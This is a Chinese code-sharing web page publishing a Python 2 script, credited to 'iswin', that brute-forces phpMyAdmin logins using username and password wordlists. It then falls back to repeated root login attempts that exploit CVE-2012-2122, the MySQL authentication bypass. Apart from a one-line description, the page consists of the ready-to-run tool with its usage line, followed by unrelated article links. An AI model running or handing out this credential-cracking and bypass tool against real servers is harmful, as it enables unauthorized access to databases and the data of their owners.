Python写的PHPMyAdmin暴力破解工具代码


Posted in Python onAugust 06, 2014

PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def Crack(url,username,password):
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) 
	headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
	params = urllib.urlencode({'pma_username': username, 'pma_password': password})
	request = urllib2.Request(url+"/index.php", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:
		return username,password
	return 0
def MySQLAuthenticationBypassCheck(host,port):
	i=0
	while i<300:
		i=i+1
		subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()
if __name__ == '__main__':
	if len(sys.argv)<4:
		print "#author:iswin\n#useage python pma.py https://3water.com/phpmyadmin/ username.txt password.txt"
		sys.exit()
	print "Bruting,Pleas wait..."
	for name in open(sys.argv[2],"r"):
		for passw in open(sys.argv[3],"r"):
			state=Crack(sys.argv[1],name,passw)
			if state!=0:
				print "\nBrute successful"
				print "UserName: "+state[0]+"PassWord: "+state[1]
				sys.exit()
	print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"
	choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n')
	if choice=='Y' or choice=='y':
		host=raw_input('Host:')
		port=raw_input('Port:')
		MySQLAuthenticationBypassCheck(host,port)
Python 相关文章推荐
python简单实现计算过期时间的方法
Jun 09 Python
python开发中range()函数用法实例分析
Nov 12 Python
Python中内置数据类型list,tuple,dict,set的区别和用法
Dec 14 Python
通过python+selenium3实现浏览器刷简书文章阅读量
Dec 26 Python
python 解压pkl文件的方法
Oct 25 Python
Python+OpenCV感兴趣区域ROI提取方法
Jan 10 Python
将string类型的数据类型转换为spark rdd时报错的解决方法
Feb 18 Python
Python小程序 控制鼠标循环点击代码实例
Oct 08 Python
Python树莓派学习笔记之UDP传输视频帧操作详解
Nov 15 Python
pytorch 状态字典:state_dict使用详解
Jan 17 Python
python实现图像全景拼接
Mar 27 Python
python+selenium 简易地疫情信息自动打卡签到功能的实现代码
Aug 22 Python
Python写的Discuz7.2版faq.php注入漏洞工具
Aug 06 #Python
Python常用列表数据结构小结
Aug 06 #Python
Python生成pdf文件的方法
Aug 04 #Python
Tornado Web服务器多进程启动的2个方法
Aug 04 #Python
Python通过解析网页实现看报程序的方法
Aug 04 #Python
基于Python实现的扫雷游戏实例代码
Aug 01 #Python
python脚本实现查找webshell的方法
Jul 31 #Python
You might like
使用PHP uniqid函数生成唯一ID
2015/11/18 PHP
php微信开发自定义菜单
2016/08/27 PHP
php实现登陆模块功能示例
2016/10/20 PHP
php实现微信支付之退款功能
2018/05/30 PHP
浅谈Laravel核心解读之Console内核
2018/12/02 PHP
PHP单元测试配置与使用方法详解
2019/12/27 PHP
关于js中window.location.href,location.href,parent.location.href,top.location.href的用法与区别
2010/10/18 Javascript
jquery中使用ajax获取远程页面信息
2011/11/13 Javascript
javascript插入样式实现代码
2012/02/22 Javascript
jQuery异步上传文件插件ajaxFileUpload详细介绍
2015/05/19 Javascript
jQuery实现图片左右滚动特效
2020/04/20 Javascript
基于Jquery实现仿百度百科右侧导航代码附源码下载
2015/11/27 Javascript
jQuery基于BootStrap样式实现无限极地区联动
2016/08/26 Javascript
Vue2.0使用过程常见的一些问题总结学习
2017/04/10 Javascript
微信小程序 标签传入数据
2017/05/08 Javascript
react实现一个优雅的图片占位模块组件详解
2017/10/30 Javascript
vue中动态select的使用方法示例
2019/10/28 Javascript
vue实现整屏滚动切换
2020/06/29 Javascript
Element Cascader 级联选择器的使用示例
2020/07/27 Javascript
区分vue-router的hash和history模式
2020/10/03 Javascript
原生JS运动实现轮播图
2021/01/02 Javascript
web.py在模板中输出美元符号的方法
2014/08/26 Python
python中__slots__用法实例
2015/06/04 Python
Python实现连接两个无规则列表后删除重复元素并升序排序的方法
2018/02/05 Python
python 获取毫秒数,计算调用时长的方法
2019/02/20 Python
HTML5新增的Css选择器、伪类介绍
2013/08/07 HTML / CSS
全球速卖通西班牙站:AliExpress西班牙
2017/10/30 全球购物
公关关系专员的自我评价分享
2013/11/20 职场文书
小学生演讲稿大全
2014/04/25 职场文书
商业融资计划书
2014/04/29 职场文书
水利局群众路线专题民主生活会发言材料
2014/09/21 职场文书
2015年班级元旦晚会活动总结
2014/11/28 职场文书
国博复兴之路观后感
2015/06/02 职场文书
安全伴我行主题班会
2015/08/13 职场文书
农村房屋租赁合同(范本)
2019/07/23 职场文书
导游词之茶卡盐湖
2019/11/26 职场文书